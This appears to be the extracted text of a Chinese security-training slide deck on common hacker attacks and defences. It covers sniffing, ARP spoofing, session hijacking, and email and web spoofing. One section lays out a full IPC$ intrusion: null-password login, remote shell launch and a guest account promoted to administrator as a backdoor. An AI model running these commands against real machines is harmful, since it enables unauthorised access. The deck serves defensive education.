常见黑客攻击与防范

常见黑客攻击与防范绿盟科技于慧龙提纲常见的黑客攻击方法常用的安全防范措施常见的黑客攻击方法19801985199019952000密码猜测可自动复制的代码密码破解利用已知的漏洞破坏审计系统后门会话劫持擦除痕迹嗅探包欺骗GUI远程控制自动探测扫描拒绝服务年中美黑客大战事件背景和经过4.1撞机事件为导火线4月初，以PoizonB0x、pr0phet为代表的美国黑客组织对国内站点进行攻击，约300个左右的站点页面被修改4月下旬，国内红（黑）客组织或个人，开始对美国网站进行小规模的攻击行动，4月26日有人发表了“五一卫国网战”战前声明，宣布将在5月1日至8日，对美国网站进行大规模的攻击行动。各方都得到第三方支援各大媒体纷纷报道，评论，中旬结束大战PoizonB0x、pr0phet更改的网页中经网数据有限公司中国科学院心理研究所国内某政府网站国内某大型商业网站国内黑客组织更改的网站页面美国劳工部网站美国某节点网站美国某大型商业网站美国某政府网站这次事件中采用的常用攻击手法红客联盟负责人在5月9日网上记者新闻发布会上对此次攻击事件的技术背景说明如下：“我们更多的是一种不满情绪的发泄，大家也可以看到被攻破的都是一些小站，大部分都是NT/Win2000系统，这个行动在技术上是没有任何炫耀和炒作的价值的。”主要采用当时流行的系统漏洞进行攻击这次事件中被利用的典型漏洞用户名泄漏，缺省安装的系统用户名和密码Unicode编码可穿越firewall,执行黑客指令ASP源代码泄露可远程连接的数据库用户名和密码SQLserver缺省安装微软Windows2000登录验证机制可被绕过Bind远程溢出，Lion蠕虫SUNrpc.sadmind远程溢出，sadmin/IIS蠕虫Wu-Ftpd格式字符串错误远程安全漏洞拒绝服务(syn-flood,ping)这次事件中被利用的典型漏洞用户名泄漏，缺省安装的系统用户名和密码入侵者利用黑客工具扫描系统用户获得用户名和简单密码这次事件中被利用的典型漏洞Windows2000登录验证机制可被绕过常见的安全攻击方法直接获取口令进入系统：网络监听，暴力破解利用系统自身安全漏洞特洛伊木马程序：伪装成工具程序或者游戏等诱使用户打开或下载，然后使用户在无意中激活，导致系统后门被安装欺骗：诱使用户访问纂改过的网页电子邮件攻击：邮件炸弹、邮件欺骗网络监听：获取明文传输的敏感信息通过一个节点来攻击其他节点：攻击者控制一台主机后，经常通过IP欺骗或者主机信任关系来攻击其他节点以隐蔽其入侵路径和擦除攻击证据拒绝服务攻击和分布式拒绝服务攻击(D.o.S和D.D.o.S)一次利用ipc$的入侵过程1.C:\netuse\\x.x.x.x\IPC$“”/user:“admintitrators”用《流光》扫到的用户名是administrators，密码为“空”的IP地址2.C:\copysrv.exe\\x.x.x.x\admin$先复制srv.exe上去，在流光的Tools目录下3.C:\nettime\\x.x.x.x查查时间，发现x.x.x.x的当前时间是2003/3/19上午11:00，命令成功完成。4.C:\at\\x.x.x.x11:05srv.exe用at命令启动srv.exe吧（这里设置的时间要比主机时间推后）5.C:\nettime\\x.x.x.x再查查时间到了没有，如果x.x.x.x的当前时间是2003/3/19上午11:05，那就准备开始下面的命令。6.C:\telnetx.x.x.x99这里会用到Telnet命令吧，注意端口是99。Telnet默认的是23端口，但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。虽然我们可以Telnet上去了，但是SRV是一次性的，下次登录还要再激活！所以我们打算建立一个Telnet服务！这就要用到ntlm了一次利用ipc$的入侵过程7.C:\copyntlm.exe\\127.0.0.1\admin$ntlm.exe也在《流光》的Tools目录中8.C:\WINNT\system32ntlm输入ntlm启动（这里的C:\WINNT\system32是在对方计算机上运行当出现“DONE”的时候，就说明已经启动正常。然后使用“netstarttelnet”来开启Telnet服务)9.Telnetx.x.x.x，接着输入用户名与密码就进入对方了为了方便日后登陆,将guest激活并加到管理组10.C:\netuserguest/active:yes11.C:\netuserguest1234将Guest的密码改为123412.C:\netlocalgroupadministratorsguest/add将Guest变为Administrator网络监听及防范技术网络窃听是指通过截获他人网络上通信的数据流，并非法从中提取重要信息的一种方法间接性利用现有网络协议的一些漏洞来实现，不直接对受害主机系统的整体性进行任何操作或破坏隐蔽性网络窃听只对受害主机发出的数据流进行操作，不与主机交换信息，也不影响受害主机的正常通信网络监听及防范技术——共享式局域网下共享式局域网采用的是广播信道，每一台主机所发出的帧都会被全网内所有主机接收到一般网卡具有以下四种工作模式：广播模式、多播模式、直接模式和混杂模式网卡的缺省工作模式是广播模式和直接模式，即只接收发给自己的和广播的帧网络监听及防范技术——共享式局域网下使用MAC地址来确定数据包的流向若等于自己的MAC地址或是广播MAC地址，则提交给上层处理程序，否则丢弃此数据当网卡工作于混杂模式的时候，它不做任何判断，直接将接收到的所有帧提交给上层处理程序共享式网络下窃听就使用网卡的混杂模式网络监听及防范技术——共享式局域网下集线器(HUB)计算机A计算机C计算机D计算机E计算机BA向C发送数据B为直接模式拒绝接收D为直接模式拒绝接收C为直接模式接收该数据E为混杂模式接收该数据网络监听及防范技术——交换式局域网下在数据链路层，数据帧的目的地址是以网卡的MAC地址来标识ARP协议实现IP—MAC的配对寻址ARP请求包是以广播的形式发出，正常情况下只有正确IP地址与的主机才会发出ARP响应包，告知查询主机自己的MAC地址。局域网中每台主机都维护着一张ARP表，其中存放着IP—MAC地址对。网络监听及防范技术——交换式局域网下ARP改向的中间人窃听主机A交换式局域网主机B（正常通信状态）主机A交换式局域网主机B（存在窃听的通信状态）主机X数据流数据流数据流A发往B：(MACb，MACa，PROTOCOL，DATA)B发往A：(MACa，MACb，PROTOCOL，DATA)A发往B：(MACx，MACa，PROTOCOL，DATA)B发往A：(MACx，MACb，PROTOCOL，DATA)网络监听及防范技术——交换式局域网下X分别向A和B发送ARP包，促使其修改ARP表主机A的ARP表中B为IPb—MACx主机B的ARP表中A为IPa—MACxX成为主机A和主机B之间的“中间人”网络监听及防范技术——网络窃听的被动防范分割网段细化网络会使得局域网中被窃听的可能性减小使用静态ARP表手工输入IP—MAC地址对采用第三层交换方式取消局域网对MAC地址、ARP协议的依赖，而采用基于IP地址的交换加密SSH、SSL、IPSec网络监听及防范技术——网络窃听的主动防范共享式局域网下的主动防范措施伪造数据包构造一个含有正确目标IP地址和一个不存在目标MAC地址——各个操作系统处理方式不同，一个比较好的MAC地址是FF-FF-FF-FF-FF-FE性能分析向网络上发送大量包含无效MAC地址的数据包，窃听主机会因处理大量信息而导致性能下降网络监听及防范技术——网络窃听的主动防范交换式局域网下的主动防范措施监听ARP数据包监听通过交换机或者网关的所有ARP数据包，与预先建立的数据库相比较定期探测数据包传送路径使用路径探测程序如tracert、traceroute等对发出数据包所经过的路径进行检查，并与备份的合法路径作比较使用SNMP定期轮询ARP表IP欺骗及防范技术——会话劫持被冒充者A服务器受害者攻击者你好，我是AA被冒充者服务器受害者攻击者你好，我是A下线!正常会话一般欺骗会话劫持IP欺骗及防范技术——会话劫持会话劫持攻击的基本步骤发现攻击目标确认动态会话猜测序列号关键一步，技术难点使被冒充主机下线伪造FIN包，拒绝服务攻击接管会话IP欺骗及防范技术——会话劫持猜测序列号TCP区分正确数据包和错误数据包仅通过它们的SEQ/ACK序列号选择恰当时间，在数据流中插入一个欺骗包，服务器将接受这个包，并且更新ACK序列号；然而客户主机仍继续使用老的SEQ序列号，而没有察觉我们的欺骗包IP欺骗及防范技术——防范技术没有有效的办法可以从根本上防范会话劫持攻击所有会话都加密保护——实现困难使用安全协议（SSH、VPN）——保护敏感会话对网络数据流采取限制保护措施——被动措施电子邮件欺骗及防范技术——案例2003年6月初，一些在中国工商银行进行过网上银行注册的客户，收到了一封来自网络管理员的电子邮件，宣称由于网络银行系统升级，要求客户重新填写用户名和密码。这一举动随后被工行工作人员发现，经证实是不法分子冒用网站公开信箱，企图窃取客户的资料。虽然没有造成多大的损失，但是这宗典型的电子邮件欺骗案例当时曾在国内安全界和金融界掀起了轩然大波，刺激人们针对信息安全问题展开了更加深切的讨论。电子邮件欺骗及防范技术——原理发送邮件使用SMTP（即简单邮件传输协议）SMTP协议的致命缺陷：过于信任原则SMTP假设的依据是：不怀疑邮件的使用者的身份和意图伪装成为他人身份向受害者发送邮件可以使用电子邮件客户端软件，也可以远程登录到25端口发送欺骗邮件电子邮件欺骗及防范技术——防范查看电子邮件头部信息不仅指出了是否有人欺骗了电子邮件，而且指出了这个信息的来源采用SMTP身份验证机制使用与POP协议收取邮件时相同的用户名/密码PGP邮件加密以公钥密码学（PublicKeyCryptology）为基础的Web欺骗及防范技术——概念人们利用计算机系统完成具有安全需求的决策时往往是基于屏幕的显示页面、URL图标、图片时间的先后顺序攻击者创造一个完整的令人信服的Web世界，但实际上它却是一个虚假的复制攻击者控制这个虚假的Web站点，受害者浏览器和Web之间所有网络通信完全被攻击者截获Web欺骗及防范技术——概念Web欺骗及防范技术——原理URL地址改写://攻击者改写Web页中的所有URL地址，使它们指向攻击者的Web服务器不是真正的Web服务器Web欺骗及防范技术——原理欺骗过程用户单击经过改写后的://；向请求文档；向返回文档；改写文档中的所有URL；